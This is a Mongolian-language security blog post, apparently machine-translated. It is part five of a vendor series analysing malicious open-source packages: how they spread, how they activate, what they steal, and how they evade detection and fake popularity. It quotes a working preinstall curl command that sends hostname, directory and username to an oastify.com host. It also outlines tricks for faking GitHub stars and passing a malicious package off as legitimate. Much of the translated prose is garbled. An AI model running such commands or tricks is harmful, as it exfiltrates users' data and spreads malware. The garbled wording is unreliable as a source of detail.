Хортой багцууд 5

Хортой багцуудын анатоми: Чиг хандлага юу вэ?

Өмнөх ангид, Нээлттэй эхийн хортой багцууд: Асуудалаюул заналхийлэгчид яагаад ийм байсныг бид ярилцсан шинэ хортой бүрэлдэхүүн хэсгүүдийг нийтлэх эсвэл одоо байгаа бүрэлдэхүүн хэсгүүдийн хамгийн сүүлийн хувилбаруудад хортой програм хангамж оруулахад маш их дуртай: Нээлттэй эхийн дэд бүтэц нь хаана ч байсан түр зуурын бүртгэл үүсгэх боломжийг олгодог. бүрэлдэхүүн хэсгийн бүртгэлд (NPM, PyPI, Docker Hub эсвэл Visual Studio Marketplace гэх мэт) эсвэл хамтын ажиллагааны хөгжүүлэлтийн платформд (GitHub гэх мэт) ашиглах боломжтой. Тэг өртөггүй бөгөөд програм хангамжийн багуудын гуравдагч талын бүрэлдэхүүн хэсгүүдэд уламжлал ёсоор байдаг илүүдэл итгэлийг ашиглах олон боломжууд. 

Халдагчид нээлттэй эхийн дэд бүтцийг ашиглан хортой програм хангамж тараахад хэр амархан байгаа, мөн програм хангамж хөгжүүлж буй байгууллагууд (бүгд?) хортой програм хангамжийн халдвар авахаас зайлсхийх (мөн бусдад зориулж тарааж буй програм хангамждаа хортой програм хангамж дамжуулах) нь хэр хэцүү байгаа хоёрын хоорондох тэгш бус байдал нь өнгөрсөн жил хортой багцын тоо бараг дөрөвний нэг саяд хүрсэн байна. 

Энэ бол маш том асуудал тул ганц байгууллага ч үүнийг шийдэж чадахгүй бөгөөд нийгэмлэг нь итгэлцэл, анхдагчаар аюулгүй байдал болон загвараар аюулгүй байдлын зарчим, бүрэлдэхүүн хэсгүүдийн амьдралын мөчлөгийн талаарх нээлттэй эхийн үйл явцыг дахин боловсруулах үйл явцад байна. Бид дараагийн ангид ийм санаануудыг авч үзэх болно. Нээлттэй эхийн хортой багцуудаас хамгаалах: Юу ажилладаггүй вэ?.

Бид ихэнх тохиолдолд нийцдэг програм хангамжийн бүрэлдэхүүн хэсгүүдийн талаар ярьж байгааг санаарай програм хангамжийн багц: програм хангамжийн манифестэд хамаарал гэж нэрлэгдэх боломжтой дахин ашиглах боломжтой бүрэлдэхүүн хэсгүүдийг багцалсан бөгөөд багц менежер эсвэл бүтээх хэрэгсэлтэй хамт суулгасан. Энэ тохиолдлыг олон нийтэд нээлттэй болгон өргөжүүлж болохыг анхаарна уу. контейнерын зураг (Kubernetes гэх мэт контейнерын ажиллах хугацаа болон найрал хөгжмийн платформуудад ашиглагддаг), мөн програм хангамжийн хэрэгслүүдийн өргөтгөлүүд (барилга, автоматжуулалт, байршуулалтад зориулагдсан). 

Энд бид үүнийг хэрхэн шинжлэхийг шинжилнэ хортой бүрэлдэхүүн хэсгүүдэд суурилсан довтолгооны тактик өнгөрсөн жишээнүүд болон бидний Malware Early Warning платформ дээр харсан зүйлсийн дагуу ажилладаг (MEW). Бид хортой бүрэлдэхүүн хэсгүүдийг өөр өөр хэмжээсээр задлан шинжлэх болно: 

(1) түгээхээр сонгосон арга (шинэ эсвэл одоо байгаа бүрэлдэхүүн хэсэгт ашигласан бүртгэл, мөн нийтлэгдсэн бүрэлдэхүүн хэсгийн хувилбарыг халдварлуулахад ашигласан арга), (2) хортой програм хангамж хэрхэн идэвхждэг эсвэл идэвхждэг, (3) хортой зан байдал, өөрөөр хэлбэл ямар хортой үйлдлүүд ажиглагдаж байгаа болон халдагчийн сэдэл нь юу вэ, (4) төөрөгдүүлэх, анзаарагдахгүйн тулд нуугдах, хажуугийн хөдөлгөөн хийх, команд болон хяналтын (C2) хостуудтай харилцах гэх мэт ямар аргууд түгээмэл байдаг; мөн (5) хохирогчид уг бүрэлдэхүүн хэсгийг суулгахын тулд хангалттай алдартай, итгэлцэл олж авах аргууд.

Сонгосон түгээлтийн механизм

Бид "дэвсгэр чимээ"Хэрэггүй хөгжүүлэгчдийг хамаарлаас нь шалтгаалан багцын нэрэнд алдаатайгаар фишинг хийхийн тулд typosquatting ашиглан нарийн төвөгтэй хортой багцуудыг ашигладаг. Олон алдартай багцууд нь алдаатай ижил нэртэй багцуудыг хүлээн авдаг бөгөөд зарим болгоомжтой хөгжүүлэгчдийг фишинг хийх болно гэсэн хүлээлттэй байдаг. 

Тэд түр зуурын бүртгэл ашигладаг, typosquat багцын бүлгийг нийтэлдэг, өөр нэгийг үүсгэдэг, өөр нэг бүлэг нийтэлдэг... Зарим автоматжуулалт болон овсгоо самбааг ашиглан тэд зарим нарийн төвөгтэй байдлыг бий болгож чаддаг ч ерөнхийдөө тэдгээр нь маш энгийн байдаг. Бид тэднийг дотроо "зангилаа"Итгэмжлэл хулгайлах нь гол зорилго боловч заримдаа бид тагнуулын програм хангамж нь эх код эсвэл хувь хүнийг таних мэдээлэл (PII), санах ойн мэдээлэл авах болон бусад эргэлзээтэй мэдээллийг нэвт шингээдэг болохыг олж хардаг."

Гэнэт гарч ирснээр бид илүү боловсронгуй хортой бүрэлдэхүүн хэсгүүд болох "акулууд"-ыг харж байна. Цөөнх нь тодорхой бүлэг эсвэл байгууллагуудад чиглэсэн байдаг бөгөөд ихэвчлэн крипто ус зайлуулах төхөөрөмж эсвэл вэб скиммерүүдийг идэвхжүүлдэг бөгөөд эдгээрийг нөхцөлт байдлаар идэвхжүүлдэг бөгөөд магадгүй ...-д үзүүлсэн аргыг дагаж мөрддөг. үйл явдлын урсгалын хэрэг явдал зөвхөн зорилтот багцаас багцыг иш татсан үед л халдлагын ачааллыг тайлах. 

Тархалтын механизмыг маш сайн, одоо сонгодог болсон бүтээлд шинжилсэн, “Backstabber's Knife цуглуулга: Нээлттэй эхийн програм хангамжийн хангамжийн сүлжээний халдлагын тойм", энэ бол заавал унших ёстой ном. Та энэ сайхан хүснэгтийг өмнө нь харж байсан нь лавтай: 

хортой багцууд

Шинэ болон одоо байгаа багцууд зэрэг бүх замыг судалсан; эх код, бүтээх систем эсвэл багцалсан бүрэлдэхүүн хэсэгт нөлөөлөх; хулгайлагдсан итгэмжлэл эсвэл нийгмийн инженерчлэлийг ашиглах; орхигдсон бүртгэл болон репозиторуудыг булаан авах эсвэл хадгалагдсан бүртгэлүүдийг хордуулах. Зарим халдлагууд нэрлэгдсэн (Бичлэг бичих, Хараат бус байдлын төөрөгдөл, Илэрхий төөрөгдөл, Репо-жекинггэх мэт) бөгөөд өөр газар аль хэдийн хэлэлцэгдсэн байсан. 

Сонгосон бүртгэлийн талаар юу хэлэх вэ?

NPM нь нийт хортой багцын тоогоор тэргүүлсээр байгаа ч энэ жилээс эхлэн PyPI дээр огцом өсөлт ажиглагдсан. Python бол өгөгдлийн шинжлэх ухаан болон машин сургалтын алдартай экосистем юм. Үнэндээ хортой програм хангамжийн нягтрал нь одоо NPM-ээс PyPI дээр өндөр байна. 

Хортой програм хангамж хэрхэн идэвхждэг вэ

Хортой багцууд нь суулгах явцад 10 тохиолдлын ердөө 4-т нь л идэвхждэг (сүүлийн жилүүдэд энэ нь 10 тохиолдлын 6-д ойртсон). Үлдсэн хэсэг нь ажиллах үед хортой үйлдэл хийдэг бөгөөд 100 тохиолдлын 1 нь туршилтыг ажиллуулах үед идэвхждэг. Өрсөлдөгчид суулгалтын скриптүүдийн хяналтгүй гүйцэтгэлийг олон газарт идэвхгүй болгосон гэдгийг мэдэж байгаа бололтой.

Муу залуус юу авч байна вэ?

Бид хортой зан үйлийн ангиллыг жагсаах бөгөөд хамгийн алдартайг нь эхлээд жагсаах болно. Нөлөөлөл нь нэлээд өөр байж болохыг анхаарна уу: a арчигч зөрүүдлэн хор хөнөөлтэй боловч энэ нь түгээмэл биш бөгөөд зөвхөн цөөн хэдэн тохиолдолд л ажиглагдсан бөгөөд энэ нь кибер дайны кампанит ажил эсвэл харгис хактивизмтай холбоотой юм. Дараах ангиллууд нэлээд түгээмэл байдаг:

  • InfoStealer / Credentials DrainerХамгийн түгээмэл тохиолддог, энгийн халдлагын 90 гаруй хувь нь нууц үг, хандалтын жетон, API түлхүүр, хувийн түлхүүр (SSH гэх мэт) зэрэг итгэмжлэлүүдийг хайж буй энгийн хулгайчид юм. Энэ нь бичихэд хамгийн хялбар байх (арчигчтай хамт?). Тэд мэдэгдэж буй файл/лавлах болон бусад эх сурвалжуудыг (жишээ нь бүртгэлийн түлхүүрүүд) тоолж, агуулгыг нь багцалж, уг өгөгдлийг C2 сервер рүү илгээдэг. Санаа нь энгийн: "Би фишинг итгэмжлэлд зориулж хулгайч нийтэлдэг тул дараа нь чиглүүлсэн халдлага эхлүүлэхийн тулд итгэмжлэлүүдийг ашиглаж болно". 

Ажиглагдсан C2 сүлжээ нь ерөнхийдөө Telegram сувгууд гэх мэт хямд бөгөөд бохир байдаг. ngrok маягийн туннел хийх хэрэгслүүд (ихэвчлэн VPN гаралтын IP хаягуудаар дамжуулан ил гарсан урвуу прокси хэлбэрээр). Олон зуун (!) боломжууд байдаг бөгөөд тэдгээрийн дор олон GitHub төслүүд байдаг. нууц үг хулгайлагчийн сэдэвХортой багц болон контейнер дүрсний хувьд keylogger гэх мэт мэргэшсэн програмууд ховор байдаг ч хэрэглэгчийн харилцан үйлчлэл хүлээгдэж буй хэрэгслийн өргөтгөлүүдэд илүү түгээмэл байдаг.

  • Дусаагч / Татаж авагч. Түгээмэл байдлаараа хоёрдугаарт ордог бөгөөд ихэвчлэн олон үе шаттай халдлагад эхний байранд ордог. Хортой бүрэлдэхүүн хэсгүүдийн гуравны нэгээс илүү нь droppers (хэрэв хортой ашигтай ачаалал багцад багтсан бол) эсвэл татаж авагчтай байдаг (ачааллыг халдагчийн хяналтан дор төгсгөлийн цэгээс татаж авдаг). Ачаалал нь ихэвчлэн мэдэгдэж буй хоёртын хортой програм хангамжийн хувилбар бөгөөд арын хаалга, тагнуулын програм хангамж, крипто ус зайлуулах төхөөрөмж болон бусад хэрэглээний тохиолдлуудыг суулгахад зориулж ажиллуулж, заримдаа хадгалагддаг. Татаж авсан эсвэл байршуулсан ашигтай ачаалал нь одоо байгаа хортой програм хангамжийн хоёртын файлуудаас өгсөн бүх хүчээр хоёр дахь үе шатны халдлагыг эхлүүлдэг. Хоёртын файлуудыг багц дотор тарааж, ихэвчлэн зураг эсвэл гэм хоргүй файлын төрлөөр хувиргаж, гэнэтийн сайтууд руу холбогдох үед илрүүлэхээс зайлсхийх боломжтой. 
  • Криптовалютын хулгайчид / уурхайчидСанхүүгийн сэдэлтэй өрсөлдөгчид таны үүлэн хөрөнгийг криптомайнеруудыг ажиллуулахад ашиглахад бэлэн байдаг (тэд үүлэн виртуал машинд ажиллаж байгаа эсэхийг ч илрүүлдэг). Тэд үүнд санаа тавьдаггүй. бага ашгийн харьцаа Хулгайлагдсан үүлэн дэд бүтцийн хохирогчоос ногдуулсан 53 доллар тутамд 1 доллар. Хохирогчид гэнэтийн төлбөр хүлээн авах хүртлээ үүнийг мэдэхгүй байж магадгүй юм. Аз болоход энэ нь ирдэг ба алга болдог. Cryptojacking хортой багцууд дахь кампанит ажлууд хааяа гарч ирээд дараа нь алга болж, түрийвч хэрэглэгчдэд зориулсан фишинг эсвэл эцэст нь түрийвчний үйлчилгээ үзүүлэгчийг чиглүүлдэг, тухайлбал Леджерийн дайралт.   

Бусад зан үйлүүд, тухайлбал Арын хаалга урвуу бүрхүүл нээх замаар алсаас код гүйцэтгэх нь өмнөхөөсөө бага түгээмэл болсон. Жишээлбэл, 123rf_contributor_web багц (одоо бүртгэлээс хасагдсан) ямар ч саадгүйгээр нээгдэнэ. урвуу бүрхүүлийг хуулж буулгасан. Урвуу бүрхүүлийн хуурах хуудас:

хортой багцууд 2
2024 оны 6-р сарын 24-30-ны долоо хоногт хортой багцын төрлүүд ажиглагдсан.

Хууль ёсны болон хортой бүрэлдэхүүн хэсгүүдээс гадна бид дараах хэд хэдэн зүй бус хэрэглээг ажигласан:

Спам багцууд

Ихэнхдээ NPM-д байдаг, хортой програм хангамжгүй ч хялбар орлого, могойн тос, Виаграгийн саналуудтай холбогдох холбоос гэх мэт олон мянган жижиг багц байдаг. Цөөн хэдэн хэрэглэгчид ийм спам нийтэлж, бүртгэлээс их хэмжээний зурвасын өргөнийг авдаг. Индонезиас гаралтай өөр нэг тоглогч(ид) ашиг олохыг оролдсон байж магадгүй юм. цайны урвуулан ашиглах холбогдох GitHub дамми хадгалах газруудтай хэдэн арван мянган хоорондоо холбоотой NPM багцуудыг үүсгэх замаар нээлттэй эхийн хөгжүүлэгчдэд нөхөн төлбөр олгох зорилготой. Энэ нь ашиглалтын нөхцөлийг илт зөрчиж байна.

Алдааны шагнал болон аюулгүй байдлын судалгааны луйварууд

 Багц нь алдааны шагналын хөтөлбөрийн аюулгүй байдлын алдааг илрүүлэх эсвэл экосистемийн тодорхой талыг судлах гэх мэт сайн зорилгоор өгөгдлийг гадагшлуулдаг гэж өөрийгөө тодорхойлсон үед. Бид энэ ангилалд PortSwigger-ээс (жишээ нь oastify.com домэйн дахь хост) Burp Collaborator хаяг руу таних тэмдэг авчирдаг боловч хэт мэдрэг биш мянга мянган багцыг харсан. Бид ихэвчлэн хуулбарласан зүйлсийг ажигласан. Хараат бус байдлын төөрөгдөл Алекс Бирсаны концепцийн нотолгоо, үүнтэй адил Aurora-webmail-pro багц (бүртгэлээс хасагдсан), энэ нь зүгээр л суулгахаас өмнөх скриптэд энэ муухай кодыг ажиллуулдаг:

exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done")  

Мөн "Энэ бол Энгийн Хамаарлын Төөрөгдлийн Довтолгооны Нууцлал юм"хариуцлагын тайлбар" дахь багц.jsonЭнэ нь хорлонтой санаа агуулаагүй байсан ч үйлчилгээний нөхцөлийг илт зөрчиж байна. 

Сайн мэдээ байна уу? Бид хортой бүрэлдэхүүн хэсгүүдээр дамжуулан ransomware халдлага үйлдэгдсэнийг хараахан хараагүй байна. Тодорхойгүй шалтгаанаар кибер гэмт хэрэгтнүүд уламжлалт имэйл фишинг, RDP дээр суурилсан болон drive-by татаж авах хүргэлтийн механизмыг илүүд үздэг бололтой. 

Ажиглагдсан нэмэлт техникүүд 

хортой багцууд 3

Тэсвэр тэвчээр, хамгаалалтаас зайлсхийх, мэдээлэл цуглуулах, командлал болон хяналтын байгууллагуудтай харилцах, мөн гадагшлуулах зэрэг олон аргыг ашигласан. 

Тэвчээртэй хортой бүрэлдэхүүн хэсгүүдэд хоёр дахь шатны хоёртын хортой програм хангамжийн тогтвортой байдлын функцуудыг ашиглан олж авдаг боловч заримдаа энэ зан төлөв нь багцын кодонд байрладаг бөгөөд хуваарьт даалгаварууд болон Windows бүртгэлийн өөрчлөлтүүд хамгийн түгээмэл байдаг. 

Дуулгавартай байдал нийтлэг боловч нарийн төвөгтэй биш. Ихэнх typoskvotting багцууд ("зангилаа?) огт бүдгэрүүлэхийг ашигладаггүй; олонх нь энгийн кодуудыг (base64/hex кодчилол эсвэл rot13 гэх мэт орлуулах шифрүүд) ашигладаг эсвэл зөв багаж хэрэгслээр амархан буцаадаг боломжтой код бүдгэрүүлэгч болон минификацияг ашигладаг. Зөвхөн "акулууд" л жинхэнэ, хатуу цөмт, будгаруулах, урвуу инженерчлэл хийхэд хэцүү зүйлийг хийдэг.

Далдлалт нь халдлагыг нууж болох ч яагаад нээлттэй эхийн бүрэлдэхүүн хэсгийн кодыг бүдгэрүүлэх шаардлагатай гэж? Ямар нэгэн зүйлийг ил харагдахаас нуух шаардлагатай гэсэн нотолгоо байна уу? Бид оюуны өмчийг хамгаалахын тулд бүдгэрүүлэхийг ашигладаг хортой бус багцуудын олон тохиолдлыг олсон бөгөөд энэ нь "нээлттэй эх сурвалж"-тай зөрчилддөг. Бүдгэрүүлэхийг хортой програм хангамжийн нотолгоо болгон ашиглаж болох ч энэ нь эцсийн дүгнэлт биш юм. Мөн бүдгэрүүлэхэд хэцүү байдаг. 

зайлсхийх Хамгаалалтын хяналтаас энгийн аргуудыг ашигладаг. Хортой код нь ихэвчлэн хамгаалагдсан байдаг оролдоод үз ... барих ямар ч үл хамаарах зүйлийг үл тоомсорлодог блокууд тул хэвийн бус үйл ажиллагаа бүртгэлд харагдахгүй. Тодорхой байгууллага эсвэл орчинд чиглэсэн хортой програм хангамжаас бусад тохиолдолд орчныг баталгаажуулах (VM эсвэл контейнерт ажиллуулах) ховор тохиолддог.

Зураг болон PDF файлд хоёртын файлуудыг нуух (стеганографийн нэг төрөл) нь илрүүлэхээс зайлсхийх өөр нэг арга байсан.

Хамгийн түгээмэл хортой бүрэлдэхүүн хэсгүүд нь мэдээлэл хулгайлагчид байдаг тул, Өгөгдөл цуглуулах зайлшгүй шаардлагатай. Нууц үгс (нууц үг, хандалтын жетон, API түлхүүр, криптографийн түлхүүрүүд)-ийг лог файлууд, орчны хувьсагчууд, тэр ч байтугай санах ойд (банкны троянууд болон крипто хулгайлагчдаас харагддаг) тогтмол сканнерддаг. Эх кодыг гадагшлуулах нь бас түгээмэл байдаг, учир нь багцын суулгалтыг ихэвчлэн дотоод git репозиторуудыг клончилж болох хөгжүүлэлтийн зангилаанд хийдэг. Бид git репозиторуудыг хайж байхдаа сангуудыг жагсаасан багцуудыг харсан. .env, private.pem, settings.py, app.js, эсвэл application.properties зэрэг байршлыг хайх нь нэлээд түгээмэл байдаг.

Экспресси нь өргөн хэрэглэгддэг өөр нэг үйлдэл юм. Хортой багцуудын цөөнх нь л гаргаж авсан өгөгдлийн очих газрыг нуухыг оролддог. Телеграм сувгууд болон нгрок маягийн хонгилууд ихэвчлэн ашиглагддаг. Мөн олон байдаг ихэвчлэн гадагшлуулахад ашигладаг цагаан жагсаалтад орсон домэйнууд

Давуу эрхийг нэмэгдүүлэх эсвэл хажуугийн хөдөлгөөн гэх мэт бусад техникүүд бага түгээмэл байсан. 

Алдар нэр хүнд, итгэлцлийг олж авах нь

Бэлэн болсон алуурчин хорлонтой зүйлтэй технологийн луйварчин “Энэ тэнэгүүдийг яаж итгэмээргүй болгох вэ?” гэж гайхаж байна гээд төсөөлөөд үз дээ. 

Энэ нь хортой бүрэлдэхүүн хэсгийн олон од/сэрээ (алдартай байдлын хувьд), дээрээс нь хувилбар/асуудал зэргийг харуулахын тулд оруулгыг хэрхэн хийхийг хэлнэ. pull requests (үйл ажиллагааны хувьд). Санаа нь зохиомол алдартай (од) болон хамааралтай хүмүүсийг олж авах, мөн хамааралтай байдал болон засвар үйлчилгээний талаар итгэл үнэмшилтэй харагдах явдал юм. 

Бүртгэл нь GitHub төслийн агуулга болон багцын агуулга тохирч байгаа эсэхийг шалгадаггүй.Энэ бол програм хангамжийн хангамжийн сүлжээнд сайн мэдэгдэж буй асуудал юм. Олон нийтийн бүртгэлүүд нь өөрсдөд нь шидэгдсэн бүх зүйлийг залгидаг аварга том нүхнүүд юм. Та ямар ч репозиторыг холбож болно. 

хортой багцууд 4
2024 оны 6-р сарын 24-30-ны долоо хоногийн хугацаанд болзошгүй хортой програм хангамжийн талаарх нотлох баримтын тархалт.

Хэрэв хортой багц нь алдартай багцыг алдаатай бичвэл энэ нь амархан: багцыг үүсгэж, бүртгэлд нийтлэхэд ашигласан хамаарлын манифест дэх одоо байгаа GitHub репозиторыг лавлана уу. Хуурамч GitHub репозитор дээрх шинэ багцуудын хувьд танд илүү ухаалаг, магадгүй хуурамч багц үүсгэх шаардлагатай байж магадгүй юм. од ажиглах/салаалах GitHub бүртгэлүүд скриптээр дамжуулан.

Хэрэв таны багцын агуулга нь репозитортой харьцангуй төстэй байвал хэд хэдэн сайн боловсруулсан өөрчлөлтийг энд тэнд оруулаарай... Та өөрийн хортой програм хангамжаа одоо байгаа репозитортой холбоотой алдартай багцтай төстэй шинэ багцад оруулаад, алдаа гарахыг хүлээж болно. Хэрэв хэн нэгэн tarball багцын агуулгыг GitHub репозиторын агуулгатай харьцуулж зүрхлэх юм бол хортой програм хангамж оруулах цэгүүдийн ялгааг амархан анзаарахгүй байж магадгүй юм. Бид энэ аргыг өмнө нь олон удаа харж байсан. 

Гарал үүсэл, багцыг хэрхэн бүтээсэн, ямар эх сурвалжаас, хэн хийсэн талаар бүрэлдэхүүн хэсэг нь өөрчлөлтөөс хамгаалагдсан мэдэгдэл хийх механизм. Гэхдээ энэ бол өөр түүх. 

Component X хортой програм уу?

Хортой багцуудын (бүрэн) мэдээллийн сан байдаг уу? Үгүй. Нээлттэй эхийн эмзэг байдалд CVE ID оноогдсон байдаг ч цөөн тооны хортой багцуудад (ялангуяа гарчиг болдог багцуудад) ийм ID өгөгддөг. Хортой багцуудын CWE нь CWE-506 (суулгасан хортой код). 

Ердийн хортой програм хангамжийн хэрэгслүүд (VirusTotal, MalwareBazaar, SOREL-20M...) нь хортой бүрэлдэхүүн хэсгүүдэд зориулсан тусгай заалтуудыг гаргадаггүй. Үүнийг сайшаах болно!

Шинжилгээнд зориулсан судалгааны жишээ мэдээллийн сан болон өгөгдлийн багцууд байдаг (бид тэдгээрийн цөөн хэдийг ашигладаг), гэхдээ бичилтүүд нь зөвхөн хортой багц мэдэгдэж байгаа үед шинэчлэгддэг бөгөөд энэ нь ихэвчлэн хэтэрхий оройтсон байдаг. Хэрэв та сонирхож байвал, OpenSSF Хортой багцууд сайхан эхлэл байна.

Дараагийн бичлэгт бид тухайн багц хортой эсэхийг хэрхэн мэдэх талаар хэлэлцэх болно. Спойлер: тийм ээ, бүртгэл мэдэгдэж буй хортой бүрэлдэхүүн хэсгийг устгахаас өмнө өртөлтийн цонхны эхэн үед хортой бүрэлдэхүүн хэсгүүдийг шалгах аргууд байдаг.

Цааш унших

Дараагийн ангид "Нээлттэй эхийн хортой багцуудаас хамгаалах: Юу ажилладаггүй вэ?" Бид нээлттэй эхийн аюулгүй байдлын талаар юу хийх, юу хийхгүй байх талаар хэлэлцэх болно. Аюулгүй байдлын талаар мэдлэгтэй ихэнх мэргэжилтнүүд энэ аюулыг хэрхэн зохицуулах талаар зөн совинтой байдаг ч буруу ойлголт их байдаг. 

Эдгээр санаанууд яагаад буруу байгааг, ийм буруу ойлголтууд нь энэхүү халдлагын механизмын түгээмэл байдал, байгууллагуудын тулгарч буй асар их эрсдэлд хэрхэн нөлөөлж байгааг бид авч үзэх болно. Дараа нь бид юу үр дүнтэй болох, ямар хүчин чармайлт, нөөц шаардагдахыг авч үзэх болно. 

Түүнчлэн, бид хортой багцуудын зорилго, тарилгын механизм, халдлагын техникүүдийн хувьслын талаар нийтлэл оруулах гэж байна.

Тогтмол байгаарай!

Ашигласан материал

Нээлттэй эхийн хортой багцууд: Асуудал

OSS хортой багцуудаас хамгаалах: Юу ажилладаггүй вэ?

sca-tools-програм хангамжийн-бүтцийн-шинжилгээний-хэрэгсэл
Програм хангамжийн эрсдэлээ эрэмбэлэх, засах, аюулгүй болгох
Үнэгүй бүртгэлээ аваарай.
Зээлийн картын шаардлагагүй.

Програм хангамжийн хөгжүүлэлт болон хүргэлтээ аюулгүй байлгаарай

Xygeni Product Suite-тэй хамт